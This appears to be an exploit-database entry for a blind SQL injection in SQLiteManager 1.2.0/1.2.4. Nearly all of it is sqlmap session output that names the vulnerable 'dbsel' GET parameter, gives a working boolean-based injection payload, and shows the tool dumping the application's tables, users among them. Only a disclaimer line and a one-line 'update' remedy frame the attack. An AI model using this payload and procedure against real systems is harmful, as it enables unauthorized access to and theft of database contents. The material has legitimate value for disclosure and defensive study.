Exploits / Vulnerability Discovered : 2019-08-28 |
Type : webapps |
Platform : php
This exploit / vulnerability Sqlitemanager 1.2.0 / 1.2.4 blind sql injection is for educational purposes only and if it is used you will do on your own risk!
[11:58:27] [INFO] resuming back-end DBMS 'sqlite'
[11:58:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dbsel (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: dbsel=-4019 OR 7689=7689
---
[11:58:27] [INFO] the back-end DBMS is SQLite
web server operating system: Windows
web application technology: PHP X.X.X, Apache 2.X.X
back-end DBMS: SQLite
[11:58:27] [INFO] sqlmap will dump entries of all tables from all databases
now
[11:58:27] [INFO] fetching tables for database: 'SQLite_masterdb'
[11:58:27] [INFO] fetching number of tables for database 'SQLite_masterdb'
[11:58:27] [WARNING] reflective value(s) found and filtering out
[11:58:27] [WARNING] running in a single-thread mode. Please consider usage
of o
ption '--threads' for faster data retrieval
[11:58:27] [INFO] retrieved: 5
[11:58:27] [INFO] retrieved: database
[11:58:28] [INFO] retrieved: user_function
[11:58:30] [INFO] retrieved: attachment
[11:58:31] [INFO] retrieved: groupes
[11:58:32] [INFO] retrieved: users
.....
.....
.....
3. Solution:
The product is discontinued. Update to last version.
-->